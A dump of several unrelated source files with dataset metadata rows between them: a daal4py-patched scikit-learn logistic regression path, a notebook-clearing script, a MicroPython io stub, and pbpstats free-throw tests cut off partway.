Initialization value for coefficients of logistic regression.
Useless for liblinear solver.
class_weight : dict or 'balanced', optional
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
dual : bool
Dual or primal formulation. Dual formulation is only implemented for
l2 penalty with liblinear solver. Prefer dual=False when
n_samples > n_features.
penalty : str, 'l1', 'l2', or 'elasticnet'
Used to specify the norm used in the penalization. The 'newton-cg',
'sag' and 'lbfgs' solvers support only l2 penalties. 'elasticnet' is
only supported by the 'saga' solver.
intercept_scaling : float, default 1.
Useful only when the solver 'liblinear' is used
and self.fit_intercept is set to True. In this case, x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equal to
intercept_scaling is appended to the instance vector.
The intercept becomes ``intercept_scaling * synthetic_feature_weight``.
        Note! The synthetic feature weight is subject to l1/l2 regularization,
        as are all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased.
multi_class : str, {'ovr', 'multinomial', 'auto'}, default: 'ovr'
If the option chosen is 'ovr', then a binary problem is fit for each
label. For 'multinomial' the loss minimised is the multinomial loss fit
across the entire probability distribution, *even when the data is
binary*. 'multinomial' is unavailable when solver='liblinear'.
'auto' selects 'ovr' if the data is binary, or if solver='liblinear',
and otherwise selects 'multinomial'.
.. versionadded:: 0.18
Stochastic Average Gradient descent solver for 'multinomial' case.
.. versionchanged:: 0.20
Default will change from 'ovr' to 'auto' in 0.22.
random_state : int, RandomState instance or None, optional, default None
The seed of the pseudo random number generator to use when shuffling
the data. If int, random_state is the seed used by the random number
generator; If RandomState instance, random_state is the random number
generator; If None, the random number generator is the RandomState
instance used by `np.random`. Used when ``solver`` == 'sag' or
'liblinear'.
check_input : bool, default True
If False, the input arrays X and y will not be checked.
max_squared_sum : float, default None
Maximum squared sum of X over samples. Used only in SAG solver.
If None, it will be computed, going through all the samples.
The value should be precomputed to speed up cross validation.
sample_weight : array-like, shape(n_samples,) optional
Array of weights that are assigned to individual samples.
If not provided, then each sample is given unit weight.
l1_ratio : float or None, optional (default=None)
The Elastic-Net mixing parameter, with ``0 <= l1_ratio <= 1``. Only
used if ``penalty='elasticnet'``. Setting ``l1_ratio=0`` is equivalent
to using ``penalty='l2'``, while setting ``l1_ratio=1`` is equivalent
to using ``penalty='l1'``. For ``0 < l1_ratio <1``, the penalty is a
combination of L1 and L2.
Returns
-------
coefs : ndarray, shape (n_cs, n_features) or (n_cs, n_features + 1)
List of coefficients for the Logistic Regression model. If
fit_intercept is set to True then the second dimension will be
n_features + 1, where the last item represents the intercept. For
``multiclass='multinomial'``, the shape is (n_classes, n_cs,
n_features) or (n_classes, n_cs, n_features + 1).
Cs : ndarray
Grid of Cs used for cross-validation.
n_iter : array, shape (n_cs,)
        Actual number of iterations for each Cs.
Notes
-----
You might get slightly different results with the solver liblinear than
with the others since this uses LIBLINEAR which penalizes the intercept.
.. versionchanged:: 0.19
The "copy" parameter was removed.
"""
if isinstance(Cs, numbers.Integral):
Cs = np.logspace(-4, 4, Cs)
solver = _check_solver(solver, penalty, dual)
# Preprocessing.
if check_input:
X = check_array(X, accept_sparse='csr', dtype=np.float64,
accept_large_sparse=solver != 'liblinear')
y = check_array(y, ensure_2d=False, dtype=None)
check_consistent_length(X, y)
_, n_features = X.shape
classes = np.unique(y)
random_state = check_random_state(random_state)
multi_class = _check_multi_class(multi_class, solver, len(classes))
if pos_class is None and multi_class != 'multinomial':
if (classes.size > 2):
raise ValueError('To fit OvR, use the pos_class argument')
# np.unique(y) gives labels in sorted order.
pos_class = classes[1]
# If sample weights exist, convert them to array (support for lists)
# and check length
# Otherwise set them to 1 for all examples
if sample_weight is not None:
default_weights = False
else:
default_weights = (class_weight is None)
sample_weight = _check_sample_weight(sample_weight, X,
dtype=X.dtype)
daal_ready = use_daal and solver in ['lbfgs', 'newton-cg'] and not sparse.issparse(X)
# If class_weights is a dict (provided by the user), the weights
# are assigned to the original labels. If it is "balanced", then
    # the class_weights are assigned after masking the labels with an OvR.
le = LabelEncoder()
if isinstance(class_weight, dict) or multi_class == 'multinomial':
class_weight_ = compute_class_weight(class_weight, classes, y)
sample_weight *= class_weight_[le.fit_transform(y)]
    # For doing an OvR, we need to mask the labels first; for the
    # multinomial case this is not necessary.
if multi_class == 'ovr':
w0 = np.zeros(n_features + int(fit_intercept), dtype=X.dtype)
mask_classes = np.array([-1, 1])
mask = (y == pos_class)
y_bin = np.ones(y.shape, dtype=X.dtype)
y_bin[~mask] = -1.
# for compute_class_weight
if class_weight == "balanced":
class_weight_ = compute_class_weight(class_weight, mask_classes,
y_bin)
sample_weight *= class_weight_[le.fit_transform(y_bin)]
daal_ready = daal_ready and (default_weights or np.allclose(sample_weight, np.ones_like(sample_weight)))
if daal_ready:
w0 = np.zeros(n_features + 1, dtype=X.dtype)
y_bin[~mask] = 0.
else:
w0 = np.zeros(n_features + int(fit_intercept), dtype=X.dtype)
else:
daal_ready = daal_ready and (default_weights or np.allclose(sample_weight, np.ones_like(sample_weight)))
if solver not in ['sag', 'saga']:
if daal_ready:
Y_multi = le.fit_transform(y).astype(X.dtype, copy=False)
else:
lbin = LabelBinarizer()
Y_multi = lbin.fit_transform(y)
if Y_multi.shape[1] == 1:
Y_multi = np.hstack([1 - Y_multi, Y_multi])
else:
# SAG multinomial solver needs LabelEncoder, not LabelBinarizer
le = LabelEncoder()
Y_multi = le.fit_transform(y).astype(X.dtype, copy=False)
if daal_ready:
w0 = np.zeros((classes.size, n_features + 1),
order='C', dtype=X.dtype)
else:
w0 = np.zeros((classes.size, n_features + int(fit_intercept)),
order='F', dtype=X.dtype)
if coef is not None:
# it must work both giving the bias term and not
if multi_class == 'ovr':
if coef.size not in (n_features, w0.size):
raise ValueError(
'Initialization coef is of shape %d, expected shape '
'%d or %d' % (coef.size, n_features, w0.size))
if daal_ready:
w0[-coef.size:] = np.roll(coef, 1, -1) if coef.size != n_features else coef
else:
w0[:coef.size] = coef
else:
# For binary problems coef.shape[0] should be 1, otherwise it
# should be classes.size.
n_classes = classes.size
if n_classes == 2:
n_classes = 1
if (coef.shape[0] != n_classes or
coef.shape[1] not in (n_features, n_features + 1)):
raise ValueError(
'Initialization coef is of shape (%d, %d), expected '
'shape (%d, %d) or (%d, %d)' % (
coef.shape[0], coef.shape[1], classes.size,
n_features, classes.size, n_features + 1))
if daal_ready:
w0[:, -coef.shape[1]:] = np.roll(coef, 1, -1) if coef.shape[1] != n_features else coef
else:
if n_classes == 1:
w0[0, :coef.shape[1]] = -coef
w0[1, :coef.shape[1]] = coef
else:
w0[:, :coef.shape[1]] = coef
C_daal_multiplier = 1
# commented out because this is Py3 feature
#def _map_to_binary_logistic_regression():
# nonlocal C_daal_multiplier
# nonlocal w0
# C_daal_multiplier = 2
# w0 *= 2
if multi_class == 'multinomial':
        # fmin_l_bfgs_b and newton-cg accept only ravelled parameters.
if solver in ['lbfgs', 'newton-cg']:
if daal_ready and classes.size == 2:
w0_saved = w0
w0 = w0[-1:, :]
w0 = w0.ravel()
target = Y_multi
if solver == 'lbfgs':
if daal_ready:
if classes.size == 2:
# _map_to_binary_logistic_regression()
C_daal_multiplier = 2
w0 *= 2
daal_extra_args_func = _daal4py_logistic_loss_extra_args
else:
daal_extra_args_func = _daal4py_cross_entropy_loss_extra_args
func = _daal4py_loss_and_grad
else:
func = lambda x, *args: _multinomial_loss_grad(x, *args)[0:2]
elif solver == 'newton-cg':
if daal_ready:
if classes.size == 2:
# _map_to_binary_logistic_regression()
C_daal_multiplier = 2
w0 *= 2
daal_extra_args_func = _daal4py_logistic_loss_extra_args
else:
daal_extra_args_func = _daal4py_cross_entropy_loss_extra_args
func = _daal4py_loss_
grad = _daal4py_grad_
hess = _daal4py_grad_hess_
else:
func = lambda x, *args: _multinomial_loss(x, *args)[0]
grad = lambda x, *args: _multinomial_loss_grad(x, *args)[1]
hess = _multinomial_grad_hess
warm_start_sag = {'coef': w0.T}
else:
target = y_bin
if solver == 'lbfgs':
if daal_ready:
func = _daal4py_loss_and_grad
daal_extra_args_func = _daal4py_logistic_loss_extra_args
else:
func = _logistic_loss_and_grad
elif solver == 'newton-cg':
if daal_ready:
daal_extra_args_func = _daal4py_logistic_loss_extra_args
func = _daal4py_loss_
grad = _daal4py_grad_
hess = _daal4py_grad_hess_
else:
func = _logistic_loss
grad = lambda x, *args: _logistic_loss_and_grad(x, *args)[1]
hess = _logistic_grad_hess
warm_start_sag = {'coef': np.expand_dims(w0, axis=1)}
coefs = list()
n_iter = np.zeros(len(Cs), dtype=np.int32)
for i, C in enumerate(Cs):
if solver == 'lbfgs':
if daal_ready:
extra_args = daal_extra_args_func(classes.size, w0, X, target, 0., 0.5 / C / C_daal_multiplier,
fit_intercept, value=True, gradient=True, hessian=False)
else:
extra_args = (X, target, 1. / C, sample_weight)
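            # verbose is mapped onto scipy's L-BFGS-B iprint codes: -1 silent,
            # 50 prints every 50 iterations, 1 every iteration, 100/101 add
            # per-iteration detail.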
iprint = [-1, 50, 1, 100, 101][
np.searchsorted(np.array([0, 1, 2, 3]), verbose)]
opt_res = optimize.minimize(
func, w0, method="L-BFGS-B", jac=True,
args=extra_args,
options={"iprint": iprint, "gtol": tol, "maxiter": max_iter}
)
n_iter_i = _check_optimize_result(
solver, opt_res, max_iter,
extra_warning_msg=_LOGISTIC_SOLVER_CONVERGENCE_MSG)
w0, loss = opt_res.x, opt_res.fun
if daal_ready and C_daal_multiplier == 2:
w0 *= 0.5
elif solver == 'newton-cg':
if daal_ready:
def make_ncg_funcs(f, value=False, gradient=False, hessian=False):
daal_penaltyL2 = 0.5 / C / C_daal_multiplier
_obj_, X_, y_, n_samples = daal_extra_args_func(
classes.size, w0, X, target, 0., daal_penaltyL2, fit_intercept,
value=value, gradient=gradient, hessian=hessian)
_func_ = lambda x, *args: f(x, _obj_, *args)
return _func_, (X_, y_, n_samples, daal_penaltyL2)
loss_func, extra_args = make_ncg_funcs(func, value=True)
grad_func, _ = make_ncg_funcs(grad, gradient=True)
grad_hess_func, _ = make_ncg_funcs(hess, gradient=True)
w0, n_iter_i = _newton_cg(grad_hess_func, loss_func, grad_func, w0, args=extra_args,
maxiter=max_iter, tol=tol)
else:
args = (X, target, 1. / C, sample_weight)
w0, n_iter_i = _newton_cg(hess, func, grad, w0, args=args,
maxiter=max_iter, tol=tol)
elif solver == 'liblinear':
coef_, intercept_, n_iter_i, = _fit_liblinear(
X, target, C, fit_intercept, intercept_scaling, None,
penalty, dual, verbose, max_iter, tol, random_state,
sample_weight=sample_weight)
if fit_intercept:
w0 = np.concatenate([coef_.ravel(), intercept_])
else:
w0 = coef_.ravel()
elif solver in ['sag', 'saga']:
if multi_class == 'multinomial':
target = target.astype(X.dtype, copy=False)
loss = 'multinomial'
else:
loss = 'log'
# alpha is for L2-norm, beta is for L1-norm
if penalty == 'l1':
alpha = 0.
beta = 1. / C
elif penalty == 'l2':
alpha = 1. / C
beta = 0.
else: # Elastic-Net penalty
alpha = (1. / C) * (1 - l1_ratio)
beta = (1. / C) * l1_ratio
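                # e.g. C=1.0 with l1_ratio=0.5 gives alpha = beta = 0.5,
                # splitting the total 1/C penalty between the two norms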
w0, n_iter_i, warm_start_sag = sag_solver(
X, target, sample_weight, loss, alpha,
beta, max_iter, tol,
verbose, random_state, False, max_squared_sum, warm_start_sag,
is_saga=(solver == 'saga'))
else:
            raise ValueError("solver must be one of {'liblinear', 'lbfgs', "
                             "'newton-cg', 'sag', 'saga'}, got '%s' instead" % solver)
if multi_class == 'multinomial':
if daal_ready:
if classes.size == 2:
multi_w0 = w0[np.newaxis, :]
else:
multi_w0 = np.reshape(w0, (classes.size, -1))
else:
n_classes = max(2, classes.size)
multi_w0 = np.reshape(w0, (n_classes, -1))
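                # for binary problems keep only the positive-class row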
if n_classes == 2:
multi_w0 = multi_w0[1][np.newaxis, :]
coefs.append(np.require(multi_w0, requirements='O'))
else:
coefs.append(np.require(w0, requirements='O'))
n_iter[i] = n_iter_i
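    # daal4py keeps the intercept in column 0; rotate it to the last column
    # (fit_intercept=True) or drop it (fit_intercept=False) so the returned
    # coefs match scikit-learn's layout.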
if daal_ready:
if fit_intercept:
for i, ci in enumerate(coefs):
coefs[i] = np.roll(ci, -1, -1)
else:
for i, ci in enumerate(coefs):
coefs[i] = np.delete(ci, 0, axis=-1)
return np.array(coefs), np.array(Cs), n_iter
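# Usage sketch (hypothetical data; assumes daal4py is installed so the patched
# path above is picked up when this module monkey-patches scikit-learn):
#
#     import numpy as np
#     from sklearn.linear_model import LogisticRegression
#     X = np.random.rand(200, 5)
#     y = (X[:, 0] > 0.5).astype(int)
#     clf = LogisticRegression(solver='lbfgs', max_iter=100).fit(X, y)
#     print(clf.coef_, clf.intercept_)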
if (LooseVersion(sklearn_version) >= LooseVersion("0.22")):
def _logistic_regression_path(X, y, pos_class=None, Cs=10, fit_intercept=True,
max_iter=100, tol=1e-4, verbose=0,
solver='lbfgs', coef=None,
class_weight=None, dual=False, penalty='l2',
intercept_scaling=1., multi_class='auto',
random_state=None, check_input=True,
max_squared_sum=None, sample_weight=None,
l1_ratio=None):
return __logistic_regression_path(X, y, pos_class=pos_class,
Cs=Cs, fit_intercept=fit_intercept,
max_iter=max_iter, tol=tol, verbose=verbose,
solver=solver, coef=coef,
class_weight=class_weight,
dual=dual, penalty=penalty,
intercept_scaling=intercept_scaling,
multi_class=multi_class,
random_state=random_state,
check_input=check_input,
max_squared_sum=max_squared_sum,
sample_weight=sample_weight,
l1_ratio=l1_ratio)
class LogisticRegression(LogisticRegression_original, BaseEstimator,
LinearClassifierMixin, SparseCoefMixin):
def __init__(self, penalty='l2', dual=False, tol=1e-4, C=1.0,
fit_intercept=True, intercept_scaling=1, class_weight=None,
random_state=None, solver='lbfgs', max_iter=100,
multi_class='auto', verbose=0, warm_start=False, n_jobs=None,
l1_ratio=None):
self.penalty = penalty
self.dual = dual
self.tol = tol
self.C = C
self.fit_intercept = fit_intercept
self.intercept_scaling = intercept_scaling
self.class_weight = class_weight
self.random_state = random_state
self.solver = solver
self.max_iter = max_iter
self.multi_class = multi_class
self.verbose = verbose
self.warm_start = warm_start
self.n_jobs = n_jobs
self.l1_ratio = l1_ratio
elif (LooseVersion(sklearn_version) >= LooseVersion("0.21")):
def _logistic_regression_path(X, y, pos_class=None, Cs=10, fit_intercept=True,
max_iter=100, tol=1e-4, verbose=0,
solver='lbfgs', coef=None,
class_weight=None, dual=False, penalty='l2',
intercept_scaling=1., multi_class='warn',
random_state=None, check_input=True,
max_squared_sum=None, sample_weight=None,
l1_ratio=None):
return __logistic_regression_path(X, y, pos_class=pos_class,
Cs=Cs, fit_intercept=fit_intercept,
max_iter=max_iter, tol=tol, verbose=verbose,
solver=solver, coef=coef,
class_weight=class_weight,
dual=dual, penalty=penalty,
intercept_scaling=intercept_scaling,
multi_class=multi_class,
random_state=random_state,
check_input=check_input,
max_squared_sum=max_squared_sum,
sample_weight=sample_weight,
l1_ratio=l1_ratio)
class LogisticRegression(LogisticRegression_original, BaseEstimator,
LinearClassifierMixin, SparseCoefMixin):
def __init__(self, penalty='l2', dual=False, tol=1e-4, C=1.0,
fit_intercept=True, intercept_scaling=1, class_weight=None,
random_state=None, solver='warn', max_iter=100,
multi_class='warn', verbose=0, warm_start=False, n_jobs=None,
l1_ratio=None):
self.penalty = penalty
self.dual = dual
self.tol = tol
self.C = C
self.fit_intercept = fit_intercept
self.intercept_scaling = intercept_scaling
self.class_weight = class_weight
self.random_state = random_state
self.solver = solver
self.max_iter = max_iter
self.multi_class = multi_class
self.verbose = verbose
self.warm_start = warm_start
self.n_jobs = n_jobs
self.l1_ratio = l1_ratio
else:
class LogisticRegression(LogisticRegression_original, BaseEstimator,
LinearClassifierMixin, SparseCoefMixin):
def __init__(self, penalty='l2', dual=False, tol=1e-4, C=1.0,
fit_intercept=True, intercept_scaling=1, class_weight=None,
random_state=None, solver='warn', max_iter=100,
multi_class='warn', verbose=0, warm_start=False, n_jobs=None):
self.penalty = penalty
self.dual = dual
self.tol = tol
self.C = C
self.fit_intercept = fit_intercept
self.intercept_scaling = intercept_scaling
self.class_weight = class_weight
self.random_state = random_state
self.solver = solver
self.max_iter = max_iter
self.multi_class = multi_class
self.verbose = verbose
self.warm_start = warm_start
self.n_jobs = n_jobs
| 44.327668
| 112
| 0.575869
| 5,763
| 46,943
| 4.483429
| 0.089363
| 0.021364
| 0.012772
| 0.013933
| 0.909513
| 0.89798
| 0.894187
| 0.891013
| 0.889233
| 0.889233
| 0
| 0.017001
| 0.33841
| 46,943
| 1,058
| 113
| 44.369565
| 0.814953
| 0.315553
| 0
| 0.886435
| 0
| 0
| 0.035517
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014196
| false
| 0
| 0.025237
| 0.003155
| 0.053628
| 0.006309
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a6738ead518800981ecb146de5aa559b1865476
| 248
|
py
|
Python
|
notebooks_workflow_blank/clear_notebooks.py
|
usgs/neversink_workflow
|
acd61435b8553e38d4a903c8cd7a3afc612446f9
|
[
"CC0-1.0"
] | null | null | null |
notebooks_workflow_blank/clear_notebooks.py
|
usgs/neversink_workflow
|
acd61435b8553e38d4a903c8cd7a3afc612446f9
|
[
"CC0-1.0"
] | null | null | null |
notebooks_workflow_blank/clear_notebooks.py
|
usgs/neversink_workflow
|
acd61435b8553e38d4a903c8cd7a3afc612446f9
|
[
"CC0-1.0"
] | null | null | null |
import os
import glob
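# Emit and run an nbconvert command for every notebook in the current
# directory, clearing stored cell outputs in place.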
for cf in glob.glob('*.ipynb'):
    cmd = 'jupyter nbconvert --ClearOutputPreprocessor.enabled=True --inplace {}'.format(cf)
    print(cmd)
    os.system(cmd)
| 35.428571
| 97
| 0.729839
| 29
| 248
| 6.241379
| 0.551724
| 0.176796
| 0.430939
| 0.508287
| 0.718232
| 0.718232
| 0.718232
| 0.718232
| 0
| 0
| 0
| 0
| 0.112903
| 248
| 6
| 98
| 41.333333
| 0.822727
| 0
| 0
| 0
| 0
| 0
| 0.587045
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.4
| 0
| 0.4
| 0.2
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
6a7060af3c0dc58fca9f7975cb3470a8fc4aed16
| 1,471
|
py
|
Python
|
stubs/ev3_pybricks_1_0_0/io.py
|
RonaldHiemstra/micropython-stubs
|
d97f879b01f6687baaebef1c7e26a80909c3cff3
|
[
"MIT"
] | 38
|
2020-10-18T21:59:44.000Z
|
2022-03-17T03:03:28.000Z
|
stubs/ev3_pybricks_1_0_0/io.py
|
RonaldHiemstra/micropython-stubs
|
d97f879b01f6687baaebef1c7e26a80909c3cff3
|
[
"MIT"
] | 176
|
2020-10-18T14:31:03.000Z
|
2022-03-30T23:22:39.000Z
|
stubs/ev3_pybricks_1_0_0/io.py
|
RonaldHiemstra/micropython-stubs
|
d97f879b01f6687baaebef1c7e26a80909c3cff3
|
[
"MIT"
] | 6
|
2019-10-08T05:31:21.000Z
|
2021-04-22T10:21:01.000Z
|
"""
Module: 'io' on LEGO EV3 v1.0.0
"""
# MCU: sysname=ev3, nodename=ev3, release=('v1.0.0',), version=('0.0.0',), machine=ev3
# Stubber: 1.3.2
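# NOTE: auto-generated stub; the parameterless methods below are placeholders
# for IDE completion and type discovery, not runnable implementations.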
class BytesIO:
''
def close():
pass
def flush():
pass
def getvalue():
pass
def read():
pass
def readinto():
pass
def readline():
pass
def seek():
pass
def write():
pass
class FileIO:
''
def close():
pass
def fileno():
pass
def flush():
pass
def read():
pass
def readinto():
pass
def readline():
pass
def readlines():
pass
def seek():
pass
def tell():
pass
def write():
pass
class IOBase:
''
SEEK_CUR = 1
SEEK_END = 2
SEEK_SET = 0
class StringIO:
''
def close():
pass
def flush():
pass
def getvalue():
pass
def read():
pass
def readinto():
pass
def readline():
pass
def seek():
pass
def write():
pass
class TextIOWrapper:
''
def close():
pass
def fileno():
pass
def flush():
pass
def read():
pass
def readinto():
pass
def readline():
pass
def readlines():
pass
def seek():
pass
def tell():
pass
def write():
pass
def open():
pass
| 10.896296
| 86
| 0.442556
| 157
| 1,471
| 4.127389
| 0.254777
| 0.356481
| 0.074074
| 0.092593
| 0.736111
| 0.728395
| 0.728395
| 0.728395
| 0.728395
| 0.728395
| 0
| 0.023171
| 0.442556
| 1,471
| 134
| 87
| 10.977612
| 0.767073
| 0.089735
| 0
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.425287
| false
| 0.425287
| 0
| 0
| 0.482759
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
6aacc933e6ed593ff3f3573929f1d281375d77d6
| 14,865
|
py
|
Python
|
tests/resources/test_free_throw.py
|
dblackrun/pbpstats
|
9870aae0875069644c95522592777ca950fe4cfa
|
[
"MIT"
] | 54
|
2019-10-16T00:10:51.000Z
|
2022-03-19T21:21:05.000Z
|
tests/resources/test_free_throw.py
|
dblackrun/pbpstats
|
9870aae0875069644c95522592777ca950fe4cfa
|
[
"MIT"
] | 15
|
2019-11-19T01:20:52.000Z
|
2022-02-04T13:38:37.000Z
|
tests/resources/test_free_throw.py
|
dblackrun/pbpstats
|
9870aae0875069644c95522592777ca950fe4cfa
|
[
"MIT"
] | 15
|
2019-11-19T11:54:51.000Z
|
2022-03-21T05:08:53.000Z
|
from pbpstats.resources.enhanced_pbp.data_nba.free_throw import DataFreeThrow
from pbpstats.resources.enhanced_pbp.stats_nba.free_throw import StatsFreeThrow
from pbpstats.resources.enhanced_pbp.stats_nba.field_goal import StatsFieldGoal
from pbpstats.resources.enhanced_pbp.stats_nba.foul import StatsFoul
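# The tests below build raw play-by-play event dicts and wire them together via
# previous_event/next_event, mirroring the doubly linked event sequence that
# pbpstats constructs when it parses a full game.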
def test_data_made_free_throw():
item = {
"evt": 110,
"cl": "01:09",
"de": "[NYK 17-27] O'Quinn Free Throw 2 of 2 (3 PTS)",
"locX": 0,
"locY": -80,
"mtype": 12,
"etype": 3,
"opid": "",
"tid": 1610612752,
"pid": 203124,
"hs": 17,
"vs": 27,
"epid": "",
"oftid": 1610612752,
}
period = 1
game_id = "0021900001"
event = DataFreeThrow(item, period, game_id)
assert event.is_made is True
def test_data_missed_free_throw():
item = {
"evt": 108,
"cl": "01:09",
"de": "[NYK] O'Quinn Free Throw 1 of 2 Missed",
"locX": 0,
"locY": -80,
"mtype": 11,
"etype": 3,
"opid": "",
"tid": 1610612752,
"pid": 203124,
"hs": 16,
"vs": 27,
"epid": "",
"oftid": 1610612752,
}
period = 1
game_id = "0021900001"
event = DataFreeThrow(item, period, game_id)
assert event.is_made is False
def test_stats_made_free_throw():
item = {
"EVENTNUM": 110,
"PCTIMESTRING": "01:09",
"HOMEDESCRIPTION": "O'Quinn Free Throw 2 of 2 (3 PTS)",
"EVENTMSGACTIONTYPE": 12,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203124,
"PLAYER1_TEAM_ID": 1610612752,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
event = StatsFreeThrow(item, order)
assert event.is_made is True
def test_stats_missed_free_throw():
item = {
"EVENTNUM": 108,
"PCTIMESTRING": "01:09",
"HOMEDESCRIPTION": "MISS O'Quinn Free Throw 1 of 2",
"EVENTMSGACTIONTYPE": 11,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203124,
"PLAYER1_TEAM_ID": 1610612752,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
event = StatsFreeThrow(item, order)
assert event.is_made is False
def test_ft_1_of_2():
item = {
"EVENTNUM": 108,
"PCTIMESTRING": "01:09",
"HOMEDESCRIPTION": "MISS O'Quinn Free Throw 1 of 2",
"EVENTMSGACTIONTYPE": 11,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203124,
"PLAYER1_TEAM_ID": 1610612752,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
event = StatsFreeThrow(item, order)
assert event.is_ft_1_of_2 is True
def test_ft_1_of_3():
item = {
"EVENTNUM": 108,
"PCTIMESTRING": "01:09",
"HOMEDESCRIPTION": "MISS O'Quinn Free Throw 1 of 3",
"EVENTMSGACTIONTYPE": 13,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203124,
"PLAYER1_TEAM_ID": 1610612752,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
event = StatsFreeThrow(item, order)
assert event.is_ft_1_of_3 is True
def test_ft_2_of_3():
item = {
"EVENTNUM": 108,
"PCTIMESTRING": "01:09",
"HOMEDESCRIPTION": "MISS O'Quinn Free Throw 2 of 3",
"EVENTMSGACTIONTYPE": 14,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203124,
"PLAYER1_TEAM_ID": 1610612752,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
event = StatsFreeThrow(item, order)
assert event.is_ft_2_of_3 is True
def test_num_ft_for_trip_is_3():
item = {
"EVENTNUM": 108,
"PCTIMESTRING": "01:09",
"HOMEDESCRIPTION": "MISS O'Quinn Free Throw 1 of 3",
"EVENTMSGACTIONTYPE": 13,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203124,
"PLAYER1_TEAM_ID": 1610612752,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
event = StatsFreeThrow(item, order)
assert event.num_ft_for_trip == 3
def test_away_from_play_true():
foul = {
"EVENTMSGTYPE": 6,
"EVENTMSGACTIONTYPE": 6,
"VISITORDESCRIPTION": "Away From Play Foul",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
"PLAYER1_ID": 2,
"PLAYER2_ID": 1,
}
order = 1
foul_event = StatsFoul(foul, order)
ft = {
"EVENTMSGTYPE": 3,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Free Throw 1 of 1",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 1,
}
order = 1
ft_event = StatsFreeThrow(ft, order)
make = {
"EVENTMSGTYPE": 1,
"EVENTMSGACTIONTYPE": 10,
"VISITORDESCRIPTION": "Made Shot by team that got fouled",
"PCTIMESTRING": "0:35",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 21,
}
order = 1
make_event = StatsFieldGoal(make, order)
foul_event.previous_event = None
foul_event.next_event = ft_event
ft_event.previous_event = foul_event
ft_event.next_event = make_event
make_event.previous_event = ft_event
make_event.next_event = None
assert ft_event.is_away_from_play_ft is True
def test_foul_on_made_shot_by_team_that_got_fouled_is_not_away_from_play_ft():
ft = {
"EVENTMSGTYPE": 3,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Free Throw 1 of 1",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 1,
}
order = 1
ft_event = StatsFreeThrow(ft, order)
foul = {
"EVENTMSGTYPE": 6,
"EVENTMSGACTIONTYPE": 6,
"VISITORDESCRIPTION": "Away From Play Foul",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
"PLAYER1_ID": 2,
"PLAYER2_ID": 1,
}
order = 1
foul_event = StatsFoul(foul, order)
make = {
"EVENTMSGTYPE": 1,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Made Shot by team that got fouled",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 2,
}
order = 1
make_event = StatsFieldGoal(make, order)
ft_event.previous_event = None
ft_event.next_event = foul_event
foul_event.previous_event = ft_event
foul_event.next_event = make_event
make_event.previous_event = foul_event
make_event.next_event = None
assert ft_event.is_away_from_play_ft is False
def test_foul_on_made_shot_by_team_that_didnt_get_fouled_is_away_from_play_ft():
ft = {
"EVENTMSGTYPE": 3,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Free Throw 1 of 1",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 1,
}
order = 1
ft_event = StatsFreeThrow(ft, order)
foul = {
"EVENTMSGTYPE": 6,
"EVENTMSGACTIONTYPE": 6,
"VISITORDESCRIPTION": "Away From Play Foul",
